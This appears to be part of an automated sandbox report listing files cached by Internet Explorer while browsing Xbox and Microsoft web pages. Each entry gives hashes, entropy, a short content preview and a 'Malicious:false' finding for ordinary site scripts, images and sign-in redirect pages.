                                                                                                                                                                                                              Preview: allContent = {. "locales": {. "en-us": {. "keySpecialstyles": "pydaccolade, longvideo",. "keyLinkicon1": "https://www.xbox.com/consoles",. "keyAriaicon1": "Shop for Xbox One consoles",. "keyImageicon1": "https://compass-ssl.xbox.com/assets/ca/ba/caba6646-02b5-4ccd-9b16-7f230ce43166.svg?n=Homepage-FY20_Home-Icons-0_Consoles_72x56-02.svg",. "keyAlticon1": "Shop for Xbox One consoles",. "keyCopyicon1": "CONSOLES",. "keyLinkicon2": "https://www.xbox.com/games",. "keyAriaicon2": "Shop for Xbox One GAMES",. "keyImageicon2": "https://compass-ssl.xbox.com/assets/1c/60/1c606d1e-b2f7-477f-ab81-21cf9ce15f90.svg?n=Homepage-FY20_Home-Icons-0_Games_72x56-01.svg",. "keyAlticon2": "Shop for Xbox One GAMES",. "keyCopyicon2": "GAMES",. "keyLinkicon3": "https://www.xbox.com/xbox-game-pass",. "keyAriaicon3": "Learn more about Xbox Game Pass",. "keyImageicon3": "https://compass-ssl.xbox.com/assets/dc/2d/dc2d84b2-8afc-4f70-912e-48d89d
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\allHeroes2[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):181726
                                                                                                                                                                                                              Entropy (8bit):5.274287289863717
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qw13ES+uP13ES+uL13ES+ut13ELZMm13ERk813EXWb13EX9/13EXWX13EI2XW137:rgwcCJ7tq
                                                                                                                                                                                                              MD5:98FD6DDD4F3F253D1346F98D39B5FB3A
                                                                                                                                                                                                              SHA1:E496CE4B84CCE8F09F6284B1A795E5C16215C1B0
                                                                                                                                                                                                              SHA-256:3789BF2A9740C5253F427EBCE98F2D1E1A12D487704CA5DF9B5D32788D56CFAA
                                                                                                                                                                                                              SHA-512:841E4681ADB990DFDA31124C471433EF248A2FAA68896EE2E051CCFFC3846C629627795D64F1BF33A22CD6A673077CD6BEC2DD098B7B0AB6CE26AFBF280C49DA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/home/js/allHeroes2.js
                                                                                                                                                                                                              Preview: allHeroes = {. "locales": {. "en-us": {. "keyNumberofheroes": "3",. "keyHero1type": "right",. "keyHero1extraclasses": "theme-dark",. "keyHero1imagedesktop": "https://compass-ssl.xbox.com/assets/e2/ef/e2ef2d5c-ade2-416c-b1d1-0680a2d4e6bd.jpg?n=Resident-Evil-Village_Page-Hero-1084_1920x720_02.jpg",. "keyHero1imagetablet": "https://compass-ssl.xbox.com/assets/8b/89/8b89d2ac-1a9f-46f6-8d2d-b76b50a28848.jpg?n=Resident-Evil-Village_Page-Hero-768_1083x1222.jpg",. "keyHero1imagemobile": "https://compass-ssl.xbox.com/assets/82/e8/82e8c51b-266d-4a39-aa01-76b29dcc14f3.jpg?n=Resident-Evil-Village_Page-Hero-0_767x1175.jpg",. "keyHero1imagesmallest": "https://compass-ssl.xbox.com/assets/82/e8/82e8c51b-266d-4a39-aa01-76b29dcc14f3.jpg?n=Resident-Evil-Village_Page-Hero-0_767x1175.jpg",. "keyHero1alt": "Resident Evil Village trailer video",. "keyHero1badgecopy": "####",. "keyHero1badgecolor": "gold",. "keyHero1headline": "Resident Evil Village",
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\authorize[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1185
                                                                                                                                                                                                              Entropy (8bit):5.1341053123194555
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:k+NmHp6tuE2bovcLABeU572HQ3EA+s6EIjROC+s0+NaypjRC3lcWZI1RbXI:nW6lmLABeS71F+s6fb+s0+gW9KcWGM
                                                                                                                                                                                                              MD5:77A035F3D44D16350AE34777EDD90598
                                                                                                                                                                                                              SHA1:674125C246E7E78495C25EB792C6018A7CAA73A3
                                                                                                                                                                                                              SHA-256:B580D6ED4F49B3C00D8FE8FFBEC30C93304660A9802DC767A26CF8A76AA33BBB
                                                                                                                                                                                                              SHA-512:E54F1A2BB0A52B66DEE5396B3646095D9CFC1677BE18C366DA0499B4F91791E97287AB31849392548BC5478E6031B08813A4750A8F59E337D43931CD51DB85D7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: <html><head><title>Working...</title></head><body><form method="POST" name="hiddenform" action="https://support.microsoft.com/auth/signin"><input type="hidden" name="error" value="login_required" /><input type="hidden" name="error_description" value="AADSTS50058: A silent sign-in request was sent but no user is signed in. The cookies used to represent the user&#39;s session were not sent in the request to Azure AD. This can happen if the user is using Internet Explorer or Edge, and the web app sending the silent sign-in request is in different IE security zone than the Azure AD endpoint (login.microsoftonline.com)...Trace ID: 0be3e267-2e92-492f-b2e9-c57f9b968b00..Correlation ID: acaaa1af-0081-410b-862a-672f9206b8e5..Timestamp: 2021-05-12 13:21:10Z" /><input type="hidden" name="error_uri" value="https://login.microsoftonline.com/error?code=50058" /><input type="hidden" name="state" value="https://support.microsoft.com/en-us/home/backgroundauth?provider=AAD&amp;end=False" /><noscript><p>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\b4ee3106-874b-4ab9-8024-4f2674dc2739[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1067x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):257272
                                                                                                                                                                                                              Entropy (8bit):7.978246439951502
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:pMdqBpl+CAq6Z0QxyMgILQZTiqXpwUOjQmCn9ldWUWaP3DqpEe1qr9944GUHgro4:CcV+CRgyMgII15wx8Db9TKqByzsdT85h
                                                                                                                                                                                                              MD5:D5CD40157890F2A39BAEC57079D5C498
                                                                                                                                                                                                              SHA1:99E431E7ABDD50E2CB1434A0765FE17C12BAB787
                                                                                                                                                                                                              SHA-256:D07F62BC9E80023FFBBC8D48EF9907B1F6672AC76477350839AA6B802A0044C6
                                                                                                                                                                                                              SHA-512:88CEBD23F0E66C8A18BAEA9C90610C8EF02DAD0E0FF99F68C1D2102AF342B4C08B99B5222ACC797B73F843AE00E5B483B6A9F7D043234B766613485C242A0817
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/b4/ee/b4ee3106-874b-4ab9-8024-4f2674dc2739.jpg?n=838322_Small-tout-0_No-Logo_1067x600.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........X.+.......................................................................................s.........!."1A.2Qa.q#BR.....b.$r..3CS.........4c......%&'()*56789:DEFGHIJTUVWXYZdefghijstuvwxyz..................................................................................w.......!1..AQaq."2........BR..#b...3..Sr.............$%&'()*456789:CDEFGHIJTUVWXYZcdefghijstuvwxyz..............................................................................?...1b...5...J....Xa....{.;-.t.<.....c...+..-Lp..I#.5.5.tm.lyI3..gq.%H..1.R.....#..MlC.E....b=........<..g..W...z.).+.*.H..^.(G=...'....P..]...'...b....tb..#.1ndQ.g....+=|IS..=..<z._.=G...c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.c.\c._.&._. .<x.<x.<x.<x.<x.<x.<x.<x.<x.<x.<x.a..>..z.4.Z......".....=G..I......$.lR.=..#.W..w.l.<A.x..x..x..x..x..x..x..x.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\background_gradient[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):453
                                                                                                                                                                                                              Entropy (8bit):5.019973044227213
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                                                              MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                                                              SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                                                              SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                                                              SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\backgroundauth[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):349
                                                                                                                                                                                                              Entropy (8bit):5.009838108527463
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:mdW4QW3tu/0M0bpkAqJmOsdOKdLzDWk4KqjMwgakAqJmOsonO9l5DoSO9lkAGuY8:lPg8/L2qJmDPIX5jMZaJqJmDv9lW9lki
                                                                                                                                                                                                              MD5:5AACCBFE89C934A7B4E7B9E8B06BFF67
                                                                                                                                                                                                              SHA1:69AB6CC6E0D23E7637285B63AC17867D657CBF04
                                                                                                                                                                                                              SHA-256:51569E0D5BC180DB25989FC1A5E593F96F04F107B1A1B409C7D375F8DCA2BF1D
                                                                                                                                                                                                              SHA-512:1D0CC78165A84451E5919F0DF62F1AE7078656CAC0875D9BDA2072508104A58E77FC0033D6020A4681E450B6B0CB95142642D2A10996F62B9FA610A95AAC6CE3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ....<!DOCTYPE html>..<html>..<head>...<title></title>..</head>..<body>....<script type="text/javascript">.....window.top.document.dispatchEvent(new Event("userNotAuthenticated"));....</script>.....<script type="text/javascript">....window.frameElement && window.frameElement.parentNode.removeChild(window.frameElement);...</script>..</body>..</html>
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\be43bfef-8ee9-4ed8-966a-9684425f17df[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1083x1222, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):256719
                                                                                                                                                                                                              Entropy (8bit):7.958286503496158
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:JABsrF23ycgMWFYu7vMa2ya3ZaE6VOBzqTBQpRzGwaWRdD:JAkWyeWWeheZa/Jda
                                                                                                                                                                                                              MD5:47E657F497DB15233508603C236014F5
                                                                                                                                                                                                              SHA1:6D91A34194E1DEE1587824E686A3EBD1ECEAC558
                                                                                                                                                                                                              SHA-256:F9D967E4D1CEAADEA79F18ED865C09C5B48272FA5FFBE6BFE74968B8272E9953
                                                                                                                                                                                                              SHA-512:B223CD1941F45EC787409DA8959082481A45CB29047764661A0BCD918F8FDF57178716E0426D93EB42D3AECD1EBB6816BE88D4DFAEB113A83F51C01439A94168
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/be/43/be43bfef-8ee9-4ed8-966a-9684425f17df.jpg?n=Minecraft_Large-tout-0_HTTYD_1083x1222.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d.............;.......................................................................................g.........!1.."AQaq...2B...#R...3Cbr.....$S..4cs.......%ETd......&'()*56789:DFGHIJUVWXYZefghijtuvwxyz.............................................................................{........!..1AQa."q....2B......#Rbr....3C.........$%&'()*456789:DEFGHIJSTUVWXYZcdefghijstuvwxyz..................................................................................?...L<..!..#.z..R.8.#.z...B..j0.0..9R.\t^.H..w....K...=.....+o...{g.^iS....J.ULdrT.'.Z..K.|<.~..........Z}..p.s4u....A..iPy.......g..+`y..E.h.HP.3.n)....w..d..fF....h.9l?.".=i.X#w.no...P.]A..xt9./-.2.w....q..gE[H...d=..=.P/Y]S..T}.#./a.v..B..g...i..Y.1."..%[$(=:.3.t._.M...P.N...X...}...N1.cn.^?p..%.H~..V..O....}..e.._g....t..TI...r.5.4m.&.S..d...q..|.-....g<\..3..6.+.....K
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\capi.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                              Entropy (8bit):4.876519928259816
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:F+ZMHJLEmtaFTXA6wGYlL4WgwHcqVqZuE1BdykAR+JjDQgfghn:F9wmt6XxcLbgycqI0WC8Jj1gh
                                                                                                                                                                                                              MD5:A6FDAFE32C23B5E21348293ED7C0DA66
                                                                                                                                                                                                              SHA1:1A72C3D9D9B64C463601428E900D2E878E628C61
                                                                                                                                                                                                              SHA-256:180295B3E76C04B74F65A85A4D83BA8120DF25C553DAD2EE70623E9E5EBB472B
                                                                                                                                                                                                              SHA-512:020F4DB423C43E8A54E8381F70D54801855838FF7278C97868AC51E0E4F148F6C1ADB9498BD03EB8ABBE1FDB16578EFD9FF80E08FFCDCCDB8EE8E941546FFB23
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/minified/shell/js/capi.min.js
                                                                                                                                                                                                              Preview: define("capi",["capiConfig"],function(n){return{onReady:function(t){n.isEnabled?WTOptimize.addEventHandler(WTEvent.RENDER,t):$(function(){t()})}}})
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cartcount[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1283
                                                                                                                                                                                                              Entropy (8bit):4.393500974386876
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:KPgkrfXKLf7fcabNBGFMpYMNwy+Mz4zMGgZv4c0EgtiQ5FgWyb0gDIgdcZPx+Ydg:KPv6HUY5+yAZFAXJqiXZXTMK
                                                                                                                                                                                                              MD5:1BF3F6D72753254D68A4A8C99DB850AD
                                                                                                                                                                                                              SHA1:E98B92CFF496817E3D5E6CD117F06BEEFAAD3E5F
                                                                                                                                                                                                              SHA-256:68D929A10C3CD609B936B50A541533994B044B38558A33530FF45D1B420CC07E
                                                                                                                                                                                                              SHA-512:C2F17E5861E800E32F3AC3DEA7424384E82B2F27B79C14D24686C286D5A6559CABDABB6A58DF9125334E196CC7D3116B583B3AE1D9AE6711AB21F9F4B06AF2C0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html>..<head>.. <title>title</title>..</head>..<body>.. <script>.. function getCartItemCountFromCookie() {.. var name = 'cartItemCount=';.. var allCookies = document.cookie.split(';');.. for (var i = 0; i < allCookies.length; i++) {.. var c = allCookies[i];.. while (c.charAt(0) === ' ') {.. c = c.substring(1);.. }.. if (c.indexOf(name) === 0) {.. return c.substring(name.length, c.length);.. }.. }.. return 0;.. }.... var count = getCartItemCountFromCookie();.... var parentHost = '';.. var parentOriginProtocol = '';.. var parentOrigin = '';.. try {.. parentHost = parent.location.hostname || '';.. parentOriginProtocol = parent.location.protocol;.. parentOrigin = parent.location.origin;.. } catch {..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\compare-all-microsoft-365-products[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):242701
                                                                                                                                                                                                              Entropy (8bit):5.289618639657551
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:nlRxLUgYDunRP1UWWT2hkwh2xcsfxqihtPnuMwHSexi/qS:lvLTY6nvVSexi/qS
                                                                                                                                                                                                              MD5:54778A6BE61989A932BA870782730772
                                                                                                                                                                                                              SHA1:4590F41C86EF72B170F277B0A53F4499336A2EB0
                                                                                                                                                                                                              SHA-256:159023794E81D6F34EBE1865BD3261402067A518D28EFC1995989A49D8EE8FD9
                                                                                                                                                                                                              SHA-512:A7E370564E8CA835C568EBDEB9E2A74E71EE9F3FDFDE05DAAF876369BBF5A07158C28A7678E858C2853B08427B3239E58226DC0708BECF15406F94A2199094C6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="de-ch" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;3082200c-51a0-4289-a6ca-bd0e91291629&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;de-ch&quot;,&quot;l&quot;:&quot;de-ch&quot;,&quot;mu&quot;:&quot;de-ch&quot;,&quot;rp&quot;:&quot;/de-ch/microsoft-365/buy/compare-all-microsoft-365-products&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Alle Mi
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dc-7e9864[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):2578
                                                                                                                                                                                                              Entropy (8bit):5.2144999090384045
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:63hknH2bRuBd6YjgbYjpK63NLJ/PJoUhb3wjScx0J:2i2qkUlPT3w+N
                                                                                                                                                                                                              MD5:8F24BCC8435267B4FA1CEFF4BC21CEB6
                                                                                                                                                                                                              SHA1:F3407812C57D7801AC522D4F391521CBC7B8F4A1
                                                                                                                                                                                                              SHA-256:53DDBB6113E6C9D9D25C37716C63C4C494D01CFFABA0AB860BC17F05902DE29E
                                                                                                                                                                                                              SHA-512:F899A53FA44AD4B646629F85AD1CCCF3A80370AA9B2A0AC439F962C02D5DD4606C87B29561C9684DA654A0531DB8C1FC88A385BCA9B48691C8C518C4BD44AD08
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/microsoft-365/_scrf/js/themes=default/dc-7e9864?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: define("defaultFocus",["jqReady!","domReady!"],function(){function o(n){return parseInt(n.getAttribute("tabindex"))>=0?!0:e.indexOf(n.tagName)!==-1?!0:!1}function u(n,t){for(var i,r=0;r<n.children.length;++r)i=n.children[r],o(i)&&(t.top||(t.top=i),t.bottom=i),u(i,t)}function f(n){var f={top:null,bottom:null},t,i,r;u(n,f);t=document.createElement("div");i=document.createElement("div");t.setAttribute("tabindex",0);i.setAttribute("tabindex",0);t.setAttribute("data-tv-prevent-focus",!0);i.setAttribute("data-tv-prevent-focus",!0);t.addEventListener("focus",function(){f.bottom.focus()});i.addEventListener("focus",function(){f.top.focus()});n.insertAdjacentElement("afterbegin",t);n.insertAdjacentElement("beforeend",i);r=10;t.style="width:"+document.documentElement.clientWidth+"px;height:"+r+"px;opacity:0;position:fixed;left:0;top:100px;z-index:9999";i.style="width:"+document.documentElement.clientWidth+"px;height:"+r+"px;opacity:0;position:fixed;left:0;top:"+(document.documentElement.clientHe
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\e3-082b89[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):111975
                                                                                                                                                                                                              Entropy (8bit):5.23061719734599
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uzUHQTAz7pxhX2OG+59gEkpCI+IX8BJWxFu209RhY8WOyd1EwgXA9GKamAMKSAAU:uzUzpxJIS20y9d1EwgXA95KScDCE4+
                                                                                                                                                                                                              MD5:B262085F48671616EFE0257B98C3F466
                                                                                                                                                                                                              SHA1:AA207DB69ECACA2D8198803A8A0AF654D9C0823C
                                                                                                                                                                                                              SHA-256:C63CC1C08E9AD6D4EAB20045A3D5AD6E0B712486E676C45830217714E280C451
                                                                                                                                                                                                              SHA-512:17F99F9A70CAFE636D8DEC9EFE2AC6AB26F64C699020923F0C70C5B4C0B7304A99C0FFBCF0103C6F92C0BB295C46B085CAD52D811ED2BB3E2D6F9067E0FB03D3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/MICROSOFT-365/_scrf/js/themes=default/2f-63ce8f/2d-7a9063/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/f8-73a5f2/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/91-97a04f/1f-100dea/33-abe4df/17-f90ef1/e3-082b89?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var __extends;define("ajaxWithAnimation",["jqReady!","jsll"],function(n,t){var i=["<div class='c-progress f-indeterminate-","regional","' style='margin:","0","px auto' tabindex='0' role='progressbar'><span><\/span><span><\/span><span><\/span><span><\/span><span><\/span><\/div>"],u=function(t,r){var u=n(t),o,f,e;u.length&&(o=(r.loaderType||"").toUpperCase(),i[1]=o==="PROGRESS"||o==="PROGRESSBAR"?"regional":o==="SPINNERLARGE"?"local f-progress-large f-center":"local f-progress-small",r.margin&&r.margin.length&&(i[3]=r.margin),f=i.join(""),e=(r.loaderPosition||"").toUpperCase(),e==="TOP"||e==="BOTTOM"?(u.addClass("ajaxloader"),e==="BOTTOM"?u.append(f):u.prepend(f)):(u.parent().addClass("ajaxloader"),e==="BEFORE"?u.before(f):u.after(f)))},f=function(t,i){var r=n(t),u;r.length&&(u=(i.loaderPosition||"").toUpperCase(),u!=="TOP"&&u!=="BOTTOM"&&(r=r.parent()),r.removeClass("ajaxloader").children().remove(".c-progress"))},r=function(i){i.refreshElement&&u(i.refreshElement,i);var r=n.extend(i,{s
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\e6bbaed5-481b-4dbc-8b2c-b966a3bdd69c[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, baseline, precision 8, 1067x600, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):218242
                                                                                                                                                                                                              Entropy (8bit):7.986323747883211
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6144:xB+swLDj2hYRbh5X6C4YOhew023FOqaO+UG:x3GDjnCc723wh
                                                                                                                                                                                                              MD5:DA1DC5FC7471C1E4F1F15BED8FE6C229
                                                                                                                                                                                                              SHA1:A5634E928F2520367CFF285F5A7D4AE2206A3D5F
                                                                                                                                                                                                              SHA-256:390087A9ABCECC4126A80D6F7C2A4E043B38C27F1EE8D35FF34AA5E7506E88BA
                                                                                                                                                                                                              SHA-512:2F1DB9E2A1F91E88D5293FC47572D0110EBF4A827EC2B2705F105DFCBD1EBFA6ECE13193B49E46B70B1AADB7BEF8C909714031D36A47D01B98875F4556130505
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/e6/bb/e6bbaed5-481b-4dbc-8b2c-b966a3bdd69c.jpg?n=Mass-Effect-Legendary-Edition_Small-tout-0_1067x600.jpg
                                                                                                                                                                                                              Preview: ..................................................................................................................................................Adobe.d...........X.+............................................................................................!1A.."Qaq..2..#BR...b..$3r......CS.4c.%..Ds...&5Td........................!..1AQa.."q....2....BR...#b3r.......$.4Scs.................?..y..7te.PZ&#..1BG..H.....x.8p$....3o."..#..p7y.......T..g.s..l.^P.u.U+Rfw9v,...rp..3...d...MQZ~...j(..>.....j(.&J..[....t.*.Jlq..V.(..c.8..QI....N0...u5d.T%>.8..p..#*y.8#.^..MSa..0GP....(....].h...#.....P..y.D*.G...$.c..$.>2.Yi..U...(.......hQ)".%T.B.`.....TL(..j..q....v.3wg4w...I.."`.9.W\.U..z.Q..$.,.H.w.K6.Q.9;@..AQ@!B....U(..D..r....\T.I.I...r....85s..D..y..%...H...F..W. ..#..t.gUV.4..J.......]...K.I'..+Q..ps..QD.o.F=.s..Q5R...n....y.'.....TV.C....>..0}.......x.V."K.4.F.H..I.......>A..^.F..+...0Tt.-...Q)K".li.E..-.!......T&vP..E<........n.A.ufb.L^@..J.........|T&U...?1
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\errorPageStrings[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3470
                                                                                                                                                                                                              Entropy (8bit):5.076790888059907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:z9UUiqRxqH211CUIRHERyRyntQRXaR8RS6C87a/5/+mhPcF+5g+mOC53B5Fqs1qP:JsUOHaQyYX4yJQOWCbz1Qb5
                                                                                                                                                                                                              MD5:6B26ECFA58E37D4B5EC861FCDD3F04FA
                                                                                                                                                                                                              SHA1:B69CD71F68FE35A9CE0D7EA17B5F1B2BAD9EA8FA
                                                                                                                                                                                                              SHA-256:7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
                                                                                                                                                                                                              SHA-512:1676D43B977C07A3F6A5473F12FD16E56487803A1CB9771D0F189B1201642EE79480C33A010F08DC521E57332EC4C4D888D693C6A2323C97750E97640918C3F4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "The security certificate presented by this website was not issued by a trusted certificate authority.";..var L_CertExpired_TEXT = "The security certificate presented by this website has expired or is not yet valid.";..var L_CertCNMismatch_TEXT = "The security certificate presented by this website was issued for a di
